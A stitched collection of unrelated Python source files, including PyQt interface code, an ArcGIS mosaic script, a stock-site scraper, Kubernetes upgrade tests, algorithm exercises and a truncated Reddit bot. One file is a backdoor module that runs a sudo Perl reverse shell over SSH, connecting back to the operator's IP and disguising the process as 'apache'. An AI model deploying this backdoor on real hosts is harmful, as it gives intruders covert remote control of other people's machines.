palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.lblPreview.setPalette(palette)
self.lblPreview.setAutoFillBackground(True)
self.lblPreview.setFrameShape(QtGui.QFrame.Box)
self.lblPreview.setText(_fromUtf8(""))
self.lblPreview.setScaledContents(True)
self.lblPreview.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.lblPreview.setObjectName(_fromUtf8("lblPreview"))
self.gridLayout_2.addWidget(self.lblPreview, 1, 1, 1, 1)
spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem4, 1, 0, 1, 1)
spacerItem5 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem5, 0, 1, 1, 1)
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem6, 1, 2, 1, 1)
spacerItem7 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem7, 2, 1, 1, 1)
self.dockSnapshotPreview.setWidget(self.dockWidgetContents_2)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(2), self.dockSnapshotPreview)
self.actionSelect_Database = QtGui.QAction(MainWindow)
self.actionSelect_Database.setObjectName(_fromUtf8("actionSelect_Database"))
self.menu_File.addAction(self.actionSelect_Database)
self.menubar.addAction(self.menu_File.menuAction())
self.label_3.setBuddy(self.cmbCamera)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
item = self.tblData.verticalHeaderItem(0)
item.setText(_translate("MainWindow", "TestData", None))
item = self.tblData.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "RowID", None))
item = self.tblData.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "TimeStamp", None))
item = self.tblData.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "UPC", None))
item = self.tblData.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "Image File", None))
__sortingEnabled = self.tblData.isSortingEnabled()
self.tblData.setSortingEnabled(False)
item = self.tblData.item(0, 0)
item.setText(_translate("MainWindow", "RowID", None))
item = self.tblData.item(0, 1)
item.setText(_translate("MainWindow", "TimeStamp", None))
item = self.tblData.item(0, 2)
item.setText(_translate("MainWindow", "UPC", None))
item = self.tblData.item(0, 3)
item.setText(_translate("MainWindow", "Image File", None))
self.tblData.setSortingEnabled(__sortingEnabled)
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Tab 1", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Tab 2", None))
self.menu_File.setTitle(_translate("MainWindow", "&File", None))
self.dockLivePreview.setWindowTitle(_translate("MainWindow", "Live Preview", None))
self.label_3.setText(_translate("MainWindow", "Camera", None))
self.chkAutoSnapshot.setText(_translate("MainWindow", "AutoSnapshot", None))
self.btnTakePhoto.setText(_translate("MainWindow", "Take &Snapshot", None))
self.dockSnapshotPreview.setWindowTitle(_translate("MainWindow", "Snapshot Preview", None))
self.actionSelect_Database.setText(_translate("MainWindow", "Select Database", None))
|
python
|
import argparse
import datetime
import json
import logging
import os
import subprocess
import tempfile
import arcpy
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
log = logging.getLogger(__name__)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('config_file', help='path to json config file')
args = parser.parse_args()
return args
def main(config):
cutoff_date = datetime.datetime.now(tz=datetime.timezone.utc) - datetime.timedelta(days=config['time_period_in_days'])
crf_name = 'Ovi_' + str(datetime.datetime.now(tz=datetime.timezone.utc).strftime('%Y%m%dT%H%M%S')) + '.crf'
for dataset in config['datasets']:
log.info(f'Updating {dataset["source_mosaic"]}')
arcpy.management.RemoveRastersFromMosaicDataset(in_mosaic_dataset=dataset['source_mosaic'],
where_clause='OBJECTID>=0')
arcpy.management.AddRastersToMosaicDataset(
in_mosaic_dataset=dataset['source_mosaic'],
raster_type='Raster Dataset',
input_path=dataset['raster_location'],
update_cellsize_ranges='NO_CELL_SIZES',
filter=dataset['raster_filter'],
)
arcpy.management.CalculateFields(
in_table=dataset['source_mosaic'],
fields=[
['StartDate', "datetime.datetime.strptime(!Name!.split('_')[2], '%Y%m%dT%H%M%S')"],
['EndDate', "datetime.datetime.strptime(!Name!.split('_')[2], '%Y%m%dT%H%M%S')"],
],
)
date_sel = f"StartDate <= timestamp '{cutoff_date.strftime('%Y-%m-%d %H:%M:%S')}'"
arcpy.management.RemoveRastersFromMosaicDataset(in_mosaic_dataset=dataset['source_mosaic'],
where_clause=date_sel)
arcpy.management.CalculateFields(
in_table=dataset['source_mosaic'],
fields=[
['GroupName', '"_".join(!Name!.split(";")[0].split("_")[:-1])'],
['Tag', '!Name!.split("_")[8]'],
['MinPS', '0'],
['MaxPS', '1610'],
],
)
log.info(f'Creating overview crf file for {dataset["source_mosaic"]}')
s3_crf_key = os.path.join(dataset['overview_location'], crf_name)
with tempfile.TemporaryDirectory(dir=config['raster_store']) as temp_dir:
local_crf = os.path.join(temp_dir, crf_name)
with arcpy.EnvManager(pyramid='PYRAMIDS 3', cellSize=900):
arcpy.management.CopyRaster(in_raster=dataset['source_mosaic'], out_rasterdataset=local_crf)
subprocess.run(['aws', 's3', 'cp', local_crf, s3_crf_key.replace('/vsis3/', 's3://'), '--recursive'])
log.info(f'Adding overview file to {dataset["source_mosaic"]}')
arcpy.management.AddRastersToMosaicDataset(
in_mosaic_dataset=dataset['source_mosaic'],
raster_type='Raster Dataset',
input_path=s3_crf_key,
update_cellsize_ranges='NO_CELL_SIZES',
)
selection = arcpy.management.SelectLayerByAttribute(
in_layer_or_view=dataset['source_mosaic'],
selection_type='NEW_SELECTION',
where_clause="Name LIKE 'Ovi_%'",
)
arcpy.management.CalculateFields(
in_table=selection,
fields=[
['StartDate', cutoff_date.strftime("'%m/%d/%Y %H:%M:%S'")],
['EndDate', 'datetime.datetime.now(tz=datetime.timezone.utc)'],
['MinPS', '1600'],
['MaxPS', '18000'],
['Category', '2'],
['GroupName', "'Mosaic Overview'"],
],
)
log.info(f'Updating {dataset["derived_mosaic"]}')
arcpy.management.RemoveRastersFromMosaicDataset(in_mosaic_dataset=dataset['derived_mosaic'],
where_clause='OBJECTID>=0')
arcpy.management.AddRastersToMosaicDataset(
in_mosaic_dataset=dataset['derived_mosaic'],
raster_type='Table / Raster Catalog',
input_path=dataset['source_mosaic'],
update_cellsize_ranges='NO_CELL_SIZES',
)
selection = arcpy.management.SelectLayerByAttribute(
in_layer_or_view=dataset['derived_mosaic'],
selection_type='NEW_SELECTION',
where_clause="Name NOT LIKE 'Ovi_%'",
)
arcpy.management.CalculateFields(
in_table=selection,
fields=[
['MinPS', '0'],
],
)
log.info(f'Building the boundary file for {dataset["referenced_mosaic"]}')
arcpy.management.BuildBoundary(in_mosaic_dataset=dataset['referenced_mosaic'])
log.info('Finished')
if __name__ == '__main__':
args = get_args()
with open(args.config_file) as f:
config = json.load(f)
main(config)
|
python
|
import requests
from src.models import Company
from bs4 import BeautifulSoup as bs
import time
import asyncio
class Scrap:
def __init__(self):
self.headers={
"Host":"www.nepalstock.com",
"User-Agent":"Mozilla/5.0 (X11; Linux aarch64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept":"ext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded",
"Content-Length":"52",
"Origin":"http://www.nepalstock.com",
"Connection":"keep-alive",
"Referer":"http://www.nepalstock.com/main/floorsheet/index/6547/?contract-no=&stock-symbol=&buyer=&seller=&_limit=20",
"Cookie":"ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e341021389a5ee349aafc57cb210c72f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2289.187.177.75%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A69%3A%22Mozilla%2F5.0+%28X11%3B+Linux+aarch64%3B+rv%3A78.0%29+Gecko%2F20100101+Firefox%2F78.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1630139197%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dceb0ebfc57a2d7699c286acc13699739",
"Upgrade-Insecure-Requests":"1"
}
self.payload={
"contract-no":"",
"stock-symbol":"",
"buyer":"",
"seller":"",
"_limit":"500",
}
async def get_floorsheet(self,url:str,upto:int) -> list :
start=time.time()
companies=[]
if upto<0 or upto>262:
return False
for pagination in range(upto+1):
skip=0
url=url+f"{pagination}/"
res=requests.post(url,headers=self.headers,data=self.payload).content.decode("utf-8")
souped_data=bs(res,'lxml')
floor_sheet_table=souped_data.findAll("table",attrs={"class":"table my-table"})[0]
headers=floor_sheet_table.findAll("tr",{"class":"unique"})[0]
for tds in floor_sheet_table.findAll('tr'):
if skip<2:
skip+=1
continue
else:
try:
json_template={
"contract":None,
"symbool":None,
"buyer broker":None,
"seller broker":None,
"quantity":None,
"rate":None,
"amount":None
}
fsv=tds.findAll("td")
company=Company()
company.contract=fsv[1].getText()
company.symbool=fsv[2].getText()
company.buyer_broker=fsv[3].getText()
company.seller_broker=fsv[4].getText()
company.quantity=fsv[5].getText()
company.rate=fsv[6].getText()
company.amount=fsv[7].getText()
json_template["contract"]=company.contract
json_template["symbool"]=company.symbool
json_template["buyer broker"]=company.buyer_broker
json_template["seller broker"]=company.seller_broker
json_template["quantity"]=company.quantity
json_template["rate"]=company.rate
json_template["amount"]=company.amount
companies.append(json_template)
del json_template
del company
except IndexError:
break
companies.append({"Total time taken":time.time()-start})
return companies
|
python
|
from common_fixtures import * # NOQA
import jinja2
import os
if_upgrade_testing = pytest.mark.skipif(
os.environ.get("UPGRADE_TESTING") != "true",
reason='UPGRADE_TESTING is not true')
pre_upgrade_namespace = ""
post_upgrade_namespace = ""
pre_port_ext = ""
post_port_ext = ""
@pytest.fixture(scope='session')
def get_env():
global pre_upgrade_namespace
global post_upgrade_namespace
global pre_port_ext
global post_port_ext
pre_upgrade_namespace = os.environ.get("PRE_UPGRADE_NAMESPACE")
post_upgrade_namespace = os.environ.get("POST_UPGRADE_NAMESPACE")
pre_port_ext = os.environ.get("PRE_PORT_EXT")
post_port_ext = os.environ.get("POST_PORT_EXT")
# Execute command in container
def execute_cmd(pod, cmd, namespace):
result = execute_kubectl_cmds(
"exec " + pod + " --namespace=" + namespace + " -- " + cmd)
return result
def render(tpl_path, context):
path, filename = os.path.split(tpl_path)
return jinja2.Environment(
loader=jinja2.FileSystemLoader(path)
).get_template(filename).render(context)
def create_stack(input_config):
namespace = input_config["namespace"]
create_ns(namespace)
# Create pre upgrade resources
get_response = execute_kubectl_cmds("get nodes -o json")
nodes = json.loads(get_response)
node1 = nodes['items'][0]['status']['addresses'][0]['address']
# Render the testing yaml
input_config["external_node"] = node1
fname = os.path.join(K8_SUBDIR, "upgrade_testing.yml.j2")
rendered_tmpl = render(fname, input_config)
with open(os.path.join(K8_SUBDIR, "upgrade_testing.yml"), "wt") as fout:
fout.write(rendered_tmpl)
fout.close()
execute_kubectl_cmds(
"create --namespace="+namespace,
file_name="upgrade_testing.yml")
def validate_stack(input_config):
namespace = input_config["namespace"]
lb_port = int("888" + input_config["port_ext"])
external_port = "3000" + input_config["port_ext"]
node_port = int("3100" + input_config["port_ext"])
ingress_port = "8" + input_config["port_ext"]
get_response = execute_kubectl_cmds("get nodes -o json")
nodes = json.loads(get_response)
node1 = nodes['items'][0]['status']['addresses'][0]['address']
# Verify the nginx pod is created
waitfor_pods(selector="app=nginx-pod", namespace=namespace, number=1)
get_response = execute_kubectl_cmds(
"get pod/nginx-pod -o json --namespace="+namespace)
pod = json.loads(get_response)
assert pod['metadata']['name'] == "nginx-pod"
assert pod['kind'] == "Pod"
assert pod['status']['phase'] == "Running"
container = pod['status']['containerStatuses'][0]
assert container['image'] == "husseingalal/nginx-curl"
assert container['restartCount'] == 0
assert container['ready']
assert container['name'] == "nginx"
# Verify RC is created
get_response = execute_kubectl_cmds(
"get rc/nginx -o json --namespace="+namespace)
rc = json.loads(get_response)
assert rc["metadata"]["name"] == "nginx"
assert rc["metadata"]["labels"]["name"] == "nginx"
assert rc["spec"]["replicas"] == 2
assert rc["spec"]["selector"]["name"] == "nginx"
container = rc["spec"]["template"]["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
waitfor_pods(
selector="type=rc", namespace=namespace, number=1)
get_response = execute_kubectl_cmds(
"get pod --selector=type=rc"
" -o json --namespace="+namespace)
pod = json.loads(get_response)
assert len(pod["items"]) == 2
pods_list = []
for pod in pod["items"]:
pods_list.append(pod["metadata"]["name"])
assert pod["metadata"]["labels"]["name"] == "nginx"
assert pod["metadata"]["namespace"] == namespace
container = pod["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
assert pod["status"]["phase"] == "Running"
# Verify that the Load Balancer service is working
get_response = execute_kubectl_cmds(
"get service nginx-lb -o json --namespace="+namespace)
service = json.loads(get_response)
assert service['metadata']['name'] == "nginx-lb"
assert service['kind'] == "Service"
assert service['spec']['ports'][0]['port'] == lb_port
assert service['spec']['ports'][0]['protocol'] == "TCP"
time.sleep(20)
get_response = execute_kubectl_cmds(
"get service nginx-lb -o json --namespace=" + namespace)
service = json.loads(get_response)
lbip = service['status']['loadBalancer']['ingress'][0]["ip"]
check_round_robin_access_k8s_service(pods_list, lbip, str(lb_port),
path="/name.html")
# Verify that the external service is working
check_round_robin_access_k8s_service(pods_list, node1, str(external_port),
path="/name.html")
# Verify that the Clusterip service is working
get_response = execute_kubectl_cmds(
"get service nginx-clusterip -o json --namespace="+namespace)
service = json.loads(get_response)
assert service['metadata']['name'] == "nginx-clusterip"
assert service['kind'] == "Service"
assert service['spec']['ports'][0]['port'] == 8000
assert service['spec']['ports'][0]['protocol'] == "TCP"
clusterip = service['spec']['clusterIP']
clusterport = service['spec']['ports'][0]['port']
get_response = execute_kubectl_cmds(
"get pod --selector=app=nginx-pod -o json --namespace="+namespace)
pods = json.loads(get_response)
clusterurl = clusterip+":"+str(clusterport)
nginxpod = pods['items'][0]['metadata']['name']
cmd_result = execute_cmd(
nginxpod,
'''curl -s -w "%{http_code}" ''' + clusterurl + " -o /dev/null",
namespace)
cmd_result = cmd_result.rstrip()
assert cmd_result == "200"
# Verify that the nodeport service is working
get_response = execute_kubectl_cmds(
"get service nodeport-nginx -o json --namespace="+namespace)
service = json.loads(get_response)
assert service['metadata']['name'] == "nodeport-nginx"
assert service['kind'] == "Service"
assert service['spec']['ports'][0]['nodePort'] == node_port
assert service['spec']['ports'][0]['port'] == 80
assert service['spec']['ports'][0]['protocol'] == "TCP"
get_response = execute_kubectl_cmds(
"get pod --selector=name=nginx -o json --namespace="+namespace)
pods = json.loads(get_response)
get_response = execute_kubectl_cmds("get nodes -o json")
nodes = json.loads(get_response)
for node in nodes["items"]:
node_ip = node['status']['addresses'][0]['address']
check_round_robin_access_k8s_service(pods_list, node_ip,
str(node_port), path="/name.html")
# Check if the ingress works
ingress_name = "ingress1"
port = ingress_port
# Initial set up
lbips = wait_for_ingress_to_become_active(ingress_name, namespace, 1)
selector1 = "k8s-app=k8test1-service"
pod_new_names = get_pod_names_for_selector(selector1, namespace, scale=1)
check_round_robin_access_lb_ip(pod_new_names, lbips[0], port,
hostheader="foo.bar.com",
path="/service3.html")
check_round_robin_access_lb_ip(["nginx-ingress2"], lbips[0], port,
hostheader="foo.bar.com",
path="/name.html")
def modify_stack(input_config):
namespace = input_config["namespace"]
ingress_port = "8" + input_config["port_ext"]
# Scale the RC
get_response = execute_kubectl_cmds(
"scale rc nginx --replicas=3 --namespace="+namespace)
get_response = execute_kubectl_cmds(
"get rc/nginx -o json --namespace="+namespace)
rc = json.loads(get_response)
assert rc["metadata"]["name"] == "nginx"
assert rc["metadata"]["labels"]["name"] == "nginx"
assert rc["spec"]["replicas"] == 3
assert rc["spec"]["selector"]["name"] == "nginx"
container = rc["spec"]["template"]["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
waitfor_pods(
selector="type=rc", namespace=namespace, number=3)
get_response = execute_kubectl_cmds(
"get pod --selector=type=rc"
" -o json --namespace="+namespace)
pod = json.loads(get_response)
assert len(pod["items"]) == 3
for pod in pod["items"]:
assert pod["metadata"]["labels"]["name"] == "nginx"
assert pod["metadata"]["namespace"] == namespace
container = pod["spec"]["containers"][0]
assert container["image"] == "sangeetha/testnewhostrouting"
assert container["name"] == "nginx"
assert pod["status"]["phase"] == "Running"
# Check if the ingress works
ingress_name = "ingress1"
port = ingress_port
lbips = wait_for_ingress_to_become_active(ingress_name, namespace, 1)
selector1 = "k8s-app=k8test1-service"
rc_name1 = "k8testrc1"
get_response = execute_kubectl_cmds(
"scale rc "+rc_name1+" --replicas=3 --namespace="+namespace)
waitfor_pods(selector=selector1, namespace=namespace, number=3)
pod_new_names = get_pod_names_for_selector(selector1, namespace, scale=3)
# Check if the ingress works with the new pods
ingress_name = "ingress1"
check_round_robin_access_lb_ip(pod_new_names, lbips[0], port,
hostheader="foo.bar.com",
path="/service3.html")
@if_upgrade_testing
def test_pre_upgrade_validate_stack(kube_hosts, get_env):
input_config = {
"namespace": pre_upgrade_namespace,
"port_ext": pre_port_ext
}
create_stack(input_config)
validate_stack(input_config)
@if_upgrade_testing
def test_post_upgrade_validate_stack(kube_hosts, get_env):
# Validate pre upgrade stack after the upgrade
input_config = {
"namespace": pre_upgrade_namespace,
"port_ext": pre_port_ext
}
validate_stack(input_config)
modify_stack(input_config)
# Create and validate new stack on the upgraded setup
input_config = {
"namespace": post_upgrade_namespace,
"port_ext": post_port_ext
}
create_stack(input_config)
validate_stack(input_config)
|
python
|
from backdoors.backdoor import *
class Perl(Backdoor):
prompt = Fore.RED + "(perl) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Perl module"
self.core = core
self.options = {
"port" : Option("port", 53921, "port to connect to", True),
"name" : Option("name", "apache", "name of the backdoor", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "A script written in perl which listens on the network and redirects its input to bash, and renames its process to look less conspicuous."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S perl -e \"use Socket;\" -e \"socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\" -e \"connect(SOCK, sockaddr_in(" + str(self.get_value("port")) + ",inet_aton('" + self.core.localIP + "')));\" -e \"open(STDIN, '>&SOCK');\" -e \"open(STDOUT,'>&SOCK');\" -e \"open(STDERR,'>&SOCK');\" -e \"exec({'/bin/sh'} ('" + self.get_value("name") + "', '-i'));\""
def do_exploit(self, args):
self.listen("none", "none")
self.core.curtarget.ssh.exec_command(self.get_command())
print("Perl backdoor on port %s attempted. " % self.get_value("port"))
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
python
|
pow2 = []
for x in range(1, 10):
pow2.append(2 ** x)
print(pow2)
new_pow2 = [2 ** x for x in range(1,10)] # Comprehensions
print(new_pow2)
new_pow3 = [2 ** x for x in range(1,10) if x % 2 == 0] # Comprehensions with IF
print(new_pow3)
power = lambda x: 2 ** x
conditional_values = [1,2,3,4,5]
new_pow4 = [power(x) for x in range(1,10) if x in conditional_values]
print(new_pow4)
new_pow5 = [power(x) for x in range(1,10) if conditional_values.count(x) >= 1]
print(new_pow5)
|
python
|
#!/usr/bin/env python3
"""
A module which implements the MergeSort algorithm.
"""
import sys
def parseInput(input):
"""
Converts an input string of integers into an array of integers.
"""
return [int(num) for num in input.split(',')]
def mergeSort(a):
"""
Sorts and array of numbers into ascending order.
"""
if len(a) == 1:
return a;
else:
nArrayMid = int(len(a) / 2)
a1 = a[0:nArrayMid]
a2 = a[nArrayMid: len(a)]
return merge(mergeSort(a1), mergeSort(a2));
def merge(a1, a2):
"""
Merges two arrays of numbers (both of which are expected to be pre-sorted into ascending order),
into a new array, sorted in ascending order.
"""
nTotalLength = len(a1) + len(a2)
aMerged = []
i = 0
j = 0
while len(aMerged) < nTotalLength:
if i == len(a1):
aMerged.append(a2[j])
j = j + 1
elif j == len(a2):
aMerged.append(a1[i])
i = i + 1
elif a1[i] <= a2[j]:
aMerged.append(a1[i])
i = i + 1
else:
aMerged.append(a2[j])
j = j + 1
return aMerged
def main(sInput):
aInput = parseInput(sInput)
result = mergeSort(aInput);
print(result)
if __name__ == '__main__':
main(sys.argv[1]) # The 0th argument is the module filename
|
python
|
"""
У каждой статьи указаны авторы (их несколько) и темы (их тоже
несколько). Определите самую частую пару автор-тема. Если несколько
пар встретились одинаковое число раз, то выведите обе (каждую на
новой строчке).
Формат ввода
На каждой строчке сначала указаны фамилии авторов через пробел, потом
запятая, потом темы (в одно слово) через пробел.
Например, "Ivanov Petrov, DeepLearning Biology".
Последняя строчка ввода – 0.
Формат вывода
Кортеж из фамилии автора и темы.
Например, ("Petrov", "DeepLearning").
"""
input_file = open('input.txt', encoding='utf8')
surnames_themes = []
for string_line in input_file:
if string_line != "0":
string_words = string_line.strip().split(', ')
surnames = []
for surname in string_words[0].split(' '):
surnames.append(surname)
themes = []
for theme in string_words[1].split(' '):
themes.append(theme)
for surname in surnames:
for theme in themes:
surnames_themes.append(surname + "," + theme)
else:
break
surnames_themes_freq = {}
for items in surnames_themes:
surnames_themes_freq[items] = surnames_themes.count(items)
res = {k: v for k, v in surnames_themes_freq.items() if v == max(surnames_themes_freq.values())}
for item in [*res]:
print(tuple(item.split(',')))
|
python
|
# Listing_20-1.py
# Copyright Warren & Csrter Sande, 2013
# Released under MIT license http://www.opensource.org/licenses/mit-license.php
# Version $version ----------------------------
# Minimum code for a PyQt program
import sys
from PyQt4 import QtCore, QtGui, uic # Import the Qt libraries we need
form_class = uic.loadUiType("MyFirstGui.ui")[0] # Load the UI we created in Designer
# Class definition for the main window
class MyWindowClass(QtGui.QMainWindow, form_class):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.setupUi(self)
app = QtGui.QApplication(sys.argv) # PtQt program to show our window
myWindow = MyWindowClass() # Make an instance of the window class
myWindow.show() # Start the program and
app.exec_() # display the GUI window
|
python
|
#!/usr/bin/env python
import rospy
# from sensor_msgs.msg import Temperature
from django_interface.msg import SilviaStatus
from django_interface.srv import SilviaStatusRequest, SilviaStatusRequestResponse
class StatusServer:
"""
Store machine status through subscription to status topic
Respond to service requests for status
Required as Arduino service calls do not work in ROS Melodic
"""
def __init__(self):
self.status_msg = SilviaStatus(mode=0, brew=False)
# Subscribers
self.status_subscriber = rospy.Subscriber("status", SilviaStatus, self.status_callback, queue_size=5)
# Service server
self.status_server = rospy.Service('status_request', SilviaStatusRequest, self.handle_status_request)
def status_callback(self, msg):
self.status_msg = msg
def handle_status_request(self, req):
return SilviaStatusRequestResponse(status=self.status_msg)
if __name__ == '__main__':
rospy.init_node("status_server_node", anonymous=True)
server = StatusServer()
rospy.spin()
|
python
|
# Importing the Kratos Library
import KratosMultiphysics as KM
# CoSimulation imports
import KratosMultiphysics.CoSimulationApplication.factories.solver_wrapper_factory as solver_wrapper_factory
def Create(settings, models, solver_name):
input_file_name = settings["input_file"].GetString()
settings.RemoveValue("input_file")
if not input_file_name.endswith(".json"):
input_file_name += ".json"
with open(input_file_name,'r') as parameter_file:
existing_parameters = KM.Parameters(parameter_file.read())
for key, val in existing_parameters["solver_settings"].items():
settings.AddValue(key, val)
return solver_wrapper_factory.CreateSolverWrapper(settings, models, solver_name)
|
python
|
from flask import render_template, redirect
from flask_login import login_required
from . import home
from .. import db
@home.route('/')
@home.route('/index')
def homepage():
"""
Handles requests to `/` and `/index` routes
It's the landing page, index page, homepage or whatever you like to call it
"""
return render_template("home/index.html", title="Homepage")
@home.route('/dashboard')
@login_required
def dashboard():
"""
Handles requests to `/dashboard` route
It's the first page that's seen after login
"""
return render_template("home/dashboard.html", title='Dashboard')
|
python
|
'''
Blind Curated 75 - Problem 40
=============================
Reverse Bits
------------
Reverse the bits of a given 32-bit unsigned integer.
[→ LeetCode][1]
[1]: https://leetcode.com/problems/reverse-bits/
'''
def solution(n):
'''
Working inwards from both ends, use bitwise logic to swap each pair of bits.
'''
right, left = 0, 31
while right < left:
bit_r = n >> right & 1
bit_l = n >> left & 1
if bit_r:
n |= 1 << left
else:
n &= ~(1 << left)
if bit_l:
n |= 1 << right
else:
n &= ~(1 << right)
right += 1
left -= 1
return n
|
python
|
from collections import namedtuple
from collections import defaultdict
import spacy
import warnings
import numpy as np
connection = namedtuple('connection', 'node weight')
Index = namedtuple('Index', 'pid, sid, wid')
nlp = spacy.load('en')
# nlp = spacy.load('en_core_web_lg')
# nlp = spacy.load('en_vectors_web_lg', vocab=nlp.vocab)
# spacy.load('/tmp/en_wiki', vocab=nlp.vocab) # used for the time being
warnings.filterwarnings("ignore")
# Global Variables
THRESHOLD = 0.7 # MD-TPM
TREE = None # Final Tree Object
ROOT = None # Final root of Tree
DOC = None # Actual doc object for the function
SENT_RANGE = None
WORD_RANGE = None
SECTION_JOIN_THRESHHOLD = 0.95
NODE_TAGS = ['NOUN', 'ADJ']
PAIR_MAX_CONNECTIONS = 20
SVOs = None
PREPROCESSING_PIPELINE = None
VERB_PHRASES = None # To be set once in the first call of get_relation
# Logging Variables
LOG_FILE = ""
FUNCTION_COUNT = defaultdict(int)
RETURN_LOG_FILE = ""
TIME_LOG = ""
# def get_freq_sorted_dictionary():
# from collections import defaultdict
# f = open("Corpus Frequency Data/20k.txt", "r")
# ranked_words = defaultdict()
# for l1 in f.readlines():
# ranked_words[l1[0:-1]] = len(ranked_words) + 1
# return ranked_words
# WORD_RANKING = get_freq_sorted_dictionary()
|
python
|
import praw
import pdb
import re
import os
from requests import Request, Session
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects
import json
#GET request url
coin_url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest'
reddit = praw.Reddit('BTC9KBABY') #selects reddit user account. password is in praw.ini file
btc_text = open("prev_price.txt", "r") #opens previous price file
btc_prev = float(btc_text.read())
btc_text.close()
#post submission info if going up
over_title = 'It’s over 9000!!!!'
over_url = 'https://imgur.com/jyoZGyW'
#post submission info if going down
under_title = 'It’s under 9000!!!!'
under_url = 'https://i.imgur.com/SyzEGwl.png
#opens api key file so that api key is not in source code
key = open('coinmarketcap_api_key.txt')
coin_key = key.read()
#coinmarketcap recommended code
headers = {
